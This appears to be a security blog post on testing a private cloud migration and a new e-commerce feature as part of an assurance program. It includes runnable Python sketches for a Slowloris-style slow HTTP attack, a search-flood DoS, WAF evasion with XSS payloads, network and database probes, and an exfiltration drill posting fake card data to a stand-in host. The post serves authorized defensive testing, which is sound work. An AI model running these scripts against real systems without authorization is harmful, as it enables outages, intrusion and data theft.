We started this Security Assurance and Testing (SA&T) series by making the case for testing and describing which tactics make sense within an SA&T program. But it is always helpful to see how the concepts apply to more tangible situations. So we will now show how an SA&T program can provide a quick win for the security team, using two (admittedly contrived) scenarios that illustrate SA&T both at the front end of a project and on an ongoing basis, ensuring the organization stays aware of its security posture.

Infrastructure Upgrade

For this first scenario let’s consider an organization’s move to a private cloud environment to support a critical application. This is a common situation these days. The business driver is better utilization of data center resources and more agility in deploying compute to meet organizational needs.

Obviously this is a major departure from the historical rack-and-provision approach. It is attractive to organizations because it enables better operational orchestration, allowing new devices (‘instances’ in cloud land) to be spun up and taken down automatically according to the application’s scalability requirements. The private cloud architecture folks aren’t totally deaf to security, so some virtualized security tools are implemented to enforce network segmentation within the data center and to block some insider attacks.

Without an SA&T program you would probably sign off on the architecture (which does provide some security) and move on to the next thing on your list. There would be no way to figure out whether the environment is really secure until it goes live, at which point attackers will let you know quickly enough. Using SA&T techniques you can identify issues at the beginning of implementation, saving everyone a bunch of heartburn. Let’s enumerate some tests to get a feel for what you might find:

  • Infrastructure scalability: You can capture network traffic to the application, and then replay it to test the scalability of the environment. After ramping up traffic into the application, you might find that the cloud’s auto-scaling capability is inadequate. Or it might scale a bit too well, spinning up new instances too quickly or failing to take down instances fast enough. All these issues affect the value of the private cloud to the organization, and handling them properly can save Ops a lot of heartburn. (A minimal replay sketch appears after this list.)
  • Security scalability: Another aspect of the infrastructure you can test is its security – especially the virtualized security tools. By blasting the environment with a ton of traffic (the same replay technique, run at a higher rate), you might discover that your virtual security tools don’t scale – virtual appliances lack the custom silicon that lets hardware devices handle heavy load – and simply fall over. Such a failure typically either fails open, allowing attacks through, or fails closed, impacting availability. You may need to change your network architecture to expose security tools only to the amount of traffic they can handle. Either way, it is better to identify a potential bottleneck before it impairs availability or security. A quick win for sure.
  • Security evasion: You can also test the security tools to see how they deal with evasion. If the new tools don’t use the same policy as the perimeter devices, which have been tuned to deal effectively with evasion, the new virtual devices may require substantial tuning to ensure security within the private cloud. (The payload-mutation approach shown later for WAF evasion applies here as well.)
  • Network hopping: Another feature of private clouds is the ability to define network traffic flows and segmentation in software – software-defined networking. But if the virtual network isn’t configured correctly, it may be possible to jump across logical segments and access protected information. (See the segmentation probe after this list.)
  • Vulnerability testing of new instances: One of the really cool (and disruptive) aspects of cloud computing is that you no longer change, tune, or patch running servers. Just spin up a new instance, fully patched and configured correctly, move the workload over, and take down the old one. But if new instances spin up with vulnerabilities or poor configurations, auto-scaling is not your friend. Test new instances on an ongoing basis to ensure proper security – the baseline check after this list shows one way. Again, a win if something was amiss.
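
To make the replay idea concrete, here is a minimal sketch in Python using scapy. Everything in it – the pcap file name, interface, and rate multiplier – is illustrative, and in practice a purpose-built tool such as tcpreplay (with its --multiplier option) is the more common choice:

```python
# Hypothetical sketch: replay previously captured application traffic at
# an accelerated rate to exercise auto-scaling. Assumes scapy is
# installed and capture.pcap was recorded in front of the application;
# file name, interface, and multiplier are illustrative.
import time
from scapy.all import rdpcap, sendp

PCAP_FILE = "capture.pcap"   # traffic captured earlier with tcpdump
IFACE = "eth0"               # interface facing the test environment
RATE_MULTIPLIER = 10         # compress inter-packet gaps 10x

packets = rdpcap(PCAP_FILE)
prev = packets[0].time
for pkt in packets:
    # Preserve the recorded traffic pattern, just sped up
    gap = float(pkt.time - prev) / RATE_MULTIPLIER
    time.sleep(max(0.0, gap))
    prev = pkt.time
    sendp(pkt, iface=IFACE, verbose=False)
```

Running the same script at progressively higher multipliers doubles as the security scalability test: watch whether the virtual security tools keep inspecting traffic, fail open, or fail closed as load climbs.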
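
The network hopping test can be equally simple to start. Assuming you have a foothold in one logical segment, a few socket probes show whether segments the SDN policy should isolate are actually reachable. The addresses and ports below are made up:

```python
# Hypothetical sketch: from a foothold in one logical segment, check
# whether hosts in a segment that should be isolated are reachable.
# Every connection that succeeds is a segmentation gap to investigate.
import socket

PROTECTED_TARGETS = [          # hosts the SDN policy should block
    ("10.20.0.15", 1433),      # database tier
    ("10.20.0.22", 445),       # file services
    ("10.20.0.31", 22),        # management access
]

for host, port in PROTECTED_TARGETS:
    try:
        with socket.create_connection((host, port), timeout=3):
            print(f"SEGMENTATION GAP: reached {host}:{port}")
    except OSError:
        print(f"blocked as expected: {host}:{port}")
```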
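
For ongoing testing of new instances, a scheduled job can compare each freshly launched instance against the golden-image baseline, so template drift shows up quickly. This stdlib-only sketch stands in for a real scanner such as nmap or Nessus; the address, port range, and approved list are all illustrative:

```python
# Hypothetical sketch: scan a freshly spun-up instance and diff its open
# ports against the approved golden-image baseline. Real scanners do
# this faster and deeper; this just shows the shape of the check.
import socket

NEW_INSTANCE = "10.20.1.50"    # instance just launched by auto-scaling
APPROVED_PORTS = {22, 443}     # everything else should be closed

open_ports = set()
for port in range(1, 1025):
    try:
        with socket.create_connection((NEW_INSTANCE, port), timeout=0.5):
            open_ports.add(port)
    except OSError:
        pass

unexpected = open_ports - APPROVED_PORTS
if unexpected:
    print(f"baseline drift, unexpected ports: {sorted(unexpected)}")
else:
    print("instance matches the approved baseline")
```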

As you can see, many things can go wrong with any kind of infrastructure upgrade. A strong process for finding breaking points in the infrastructure before going live can mitigate much of the deployment risk – especially if you are dealing with new equipment. Given the dynamic nature of technology, you will also want to test the environment on an ongoing basis, ensuring that change doesn’t add unnecessary attack surface.

This scenario points out where many issues can be found. What happens if you can’t find any issues? Does that impact the value of the SA&T program? Actually, if anything, it enhances its value – by providing peace of mind that the infrastructure is ready for production.

New Application Capabilities

For the second scenario, let’s move up the stack a bit and discuss how SA&T applies to adding new capabilities to an application serving a large user community – in this case, enabling commerce on a web site. Business folks like to sell stuff, so they like these kinds of new capabilities. The initiative involves providing access to a critical data store that was previously inaccessible directly from any Internet-facing application, which is an obvious area of concern.

The development team has run some scans against the application to identify application layer issues such as XSS, and addressed them before deployment by front-ending the application with a WAF. So a lot of the low-hanging fruit of application testing is gone. But that shouldn’t be the end of testing. Let’s look at some other areas that could uncover issues, focusing on realistic attack patterns and tactics:

  • Attack the stack: You could use a slow HTTP attack to see whether the application can defend against availability attacks on the stack. These attacks are very hard to detect at the network layer, so you need to make sure the underlying stack is configured to deal with them. (A sketch of the technique follows this list.)
  • Shopping cart attack: Another type of availability attack uses the application’s legitimate functionality against it. It’s a bit like an autoimmune disease, where the application’s own capabilities are turned against it. By scripting huge volumes of cart and search operations, attackers overwhelm the site as it tries to serve enormous result sets, degrading response time and availability. That’s no good for a commerce application. (See the search-flood sketch below.)
  • WAF evasion: You can also go significantly deeper into the application by trying to evade the defenses in front of it, such as the WAF. We mentioned above that an application scanner showed no XSS issues because the WAF blocked its probes. But a more sophisticated testing capability that evades the WAF might show the application is still a sitting duck for XSS and buffer overflow attacks. A simple app scanning tool cannot provide those kinds of results. (The evasion sketch below shows the basic idea.)
  • Go after the data: By compromising different parts of the application stack – such as application servers – attackers can position themselves to attack the data store. As part of the testing process, try to find and connect to the data store directly. Many database security controls run in front of the database to avoid impacting DBMS performance, so if an attacker can figure out how to connect directly to the database it might be “Game Over”. (See the direct-access probe below.)
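
To illustrate the slow HTTP technique, here is a rough Slowloris-style sketch in Python. It holds connections open by sending a request that never finishes; the target host and counts are made up, and this should only ever be pointed at a system you are authorized to test:

```python
# Hypothetical sketch of a slow HTTP (Slowloris-style) test: open many
# connections, send partial request headers, and trickle one more header
# line at a time so each request never completes and holds a worker slot.
import socket
import time

TARGET, PORT = "test-app.example.com", 80   # illustrative target
CONNECTIONS = 200
TRICKLE_INTERVAL = 10                       # seconds between fragments

socks = []
for _ in range(CONNECTIONS):
    try:
        s = socket.create_connection((TARGET, PORT), timeout=4)
        # Partial request: note there is no terminating blank line
        s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n")
        socks.append(s)
    except OSError:
        break

while socks:
    time.sleep(TRICKLE_INTERVAL)
    for s in list(socks):
        try:
            s.send(b"X-Keep-Alive: 1\r\n")  # keep the request open
        except OSError:
            socks.remove(s)                 # server reaped the connection
    print(f"{len(socks)} connections still held open")
```

If the count stays high for minutes at a time, the stack is not configured to reap slow clients.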
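
The shopping cart / search flood can be approximated with nothing more than a thread pool and the application’s own search endpoint. The URL and query terms below are illustrative:

```python
# Hypothetical sketch: use the application's own search feature as the
# attack, firing broad queries concurrently and measuring how response
# times degrade under load.
import concurrent.futures
import time
import urllib.parse
import urllib.request

SEARCH_URL = "https://test-app.example.com/search?q="
BROAD_TERMS = ["a", "e", "the", "item"]   # queries with huge result sets

def timed_search(term):
    url = SEARCH_URL + urllib.parse.quote(term)
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=30) as resp:
            resp.read()
    except OSError:
        pass  # timeouts and resets are themselves findings
    return time.monotonic() - start

with concurrent.futures.ThreadPoolExecutor(max_workers=50) as pool:
    latencies = list(pool.map(timed_search, BROAD_TERMS * 100))

print(f"slowest search took {max(latencies):.1f}s; "
      f"average {sum(latencies) / len(latencies):.1f}s under load")
```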
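
A basic WAF evasion test takes a payload the WAF is known to block and retries it with common encoding mutations, recording which variants get through. The endpoint and payload set here are illustrative; real evasion testing uses far larger mutation libraries:

```python
# Hypothetical sketch: mutate a known-blocked XSS probe with common
# evasion encodings and record which variants reach the application.
# A "passed" result means the WAF policy needs tuning.
import urllib.error
import urllib.parse
import urllib.request

TARGET = "https://test-app.example.com/comment?text="  # illustrative
PROBE = "<script>alert(1)</script>"
VARIANTS = {
    "plain":          PROBE,
    "url-encoded":    urllib.parse.quote(PROBE),
    "double-encoded": urllib.parse.quote(urllib.parse.quote(PROBE)),
    "mixed-case":     "<ScRiPt>alert(1)</ScRiPt>",
}

for name, payload in VARIANTS.items():
    try:
        with urllib.request.urlopen(TARGET + payload, timeout=10) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code          # many WAFs block with a 403
    except urllib.error.URLError:
        status = None              # connection dropped outright
    if status == 200:
        verdict = "passed the WAF"
    elif status is None:
        verdict = "connection dropped"
    else:
        verdict = f"blocked ({status})"
    print(f"{name:15s} -> {verdict}")
```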
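
Finally, probing for direct data store access can start with something as simple as attempting connections to common database listener ports from an application-tier vantage point. Hosts and ports are again illustrative:

```python
# Hypothetical sketch: from a compromised-app-server vantage point, try
# to reach the database listeners directly, bypassing the security
# controls deployed in front of them.
import socket

DB_LISTENERS = [
    ("10.20.0.15", 3306),   # MySQL
    ("10.20.0.15", 5432),   # PostgreSQL
    ("10.20.0.15", 1433),   # SQL Server
]

for host, port in DB_LISTENERS:
    try:
        with socket.create_connection((host, port), timeout=3) as s:
            try:
                banner = s.recv(64)   # MySQL, for one, greets on connect
            except socket.timeout:
                banner = b""
            print(f"DIRECT DB ACCESS: {host}:{port} banner={banner[:40]!r}")
    except OSError:
        print(f"blocked: {host}:{port}")
```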

As with fully testing the infrastructure, a deeper level of application testing may reveal issues that could cause downtime or data loss. The challenging part of application testing is that attackers can use legitimate functionality – including search and shopping carts – to attack, making it even harder to determine true production readiness.

But you aren’t done yet. As mentioned in the tactics post, you can and should also be running frequent exfiltration attacks to determine whether data can be removed from your network. This ongoing testing assesses the vigilance of your security team and the effectiveness of your processes. Alerts streaming from content filtering tools are all well and good, but unless someone is validating each alert and determining the extent of any potential data loss, the alert is worthless. So an SA&T program not only tests the technology underpinnings of the environment, but the real effectiveness of the security function.
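
A minimal exfiltration drill might look like the sketch below: push a seeded marker file that your content filtering tools are tuned to catch out to an endpoint you control, note the timestamp, and then see whether anyone investigates. The endpoint and marker content are illustrative:

```python
# Hypothetical sketch of a scheduled exfiltration drill. The marker uses
# a well-known test card number so a tuned DLP/content filter should fire.
import datetime
import urllib.request

DROP_URL = "https://exfil-test.example.com/upload"   # endpoint you control
MARKER = b"TESTDATA-4111111111111111\n" * 1000       # fake card numbers

req = urllib.request.Request(DROP_URL, data=MARKER,
                             headers={"Content-Type": "text/plain"},
                             method="POST")
with urllib.request.urlopen(req, timeout=30) as resp:
    print(f"exfil drill completed at {datetime.datetime.now().isoformat()}, "
          f"status {resp.status}")
# The real test happens next: did an alert fire, and did anyone validate it?
```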

Handling the Truth

These kinds of findings from an SA&T program may be controversial within the organization – especially if Operations or Development is under significant pressure to complete the project. These efforts can be perceived as a roadblock, getting in the way of delivering value to customers and generating revenue. That is all too common – some leaders may resist holding up the project to address the issues you find. The only way to counter this resistance is with information. By being very clear about the downside (risk) of identified issues, you enable business leaders to make a business decision: accept the risk and move forward, or hold up the project until the issues are addressed.

Keep the SA&T program in perspective. If leadership decides to move forward anyway – despite significant issues – keep in mind that this does not indicate a program failure. The goal of SA&T is to provide the information needed to make educated decisions. A program should not be evaluated on whether its findings are ignored, or on the consequences of those decisions. Just make sure to document the findings, so the team can rise above the finger-pointing if issues do crop up.

Summary

As we wrap up this Security Assurance and Testing series, let’s highlight a few key points. First, you don’t know what is truly at risk until you actually attack yourself. Attackers don’t play nice, so tabletop exercises, threat models, and simple vulnerability scans cannot provide the information you need to really understand how your environment can be exploited.

Don’t forget to pay attention to the network and security devices your technology infrastructure is built upon. Attackers take the path of least resistance, and if your infrastructure is brittle they will figure that out and walk through the front door. Then they get to save their fancy 0-day attacks for an environment that deserves them.

Finally, an SA&T program involves ongoing testing across as much of the environment as possible, including infrastructure and applications. Make sure you test both availability/scalability and evasion of controls, because both offer attackers an opportunity to gain a presence in your environment. The program should include scheduled testing on an ongoing basis, as well as ad hoc testing whenever the environment undergoes significant change.
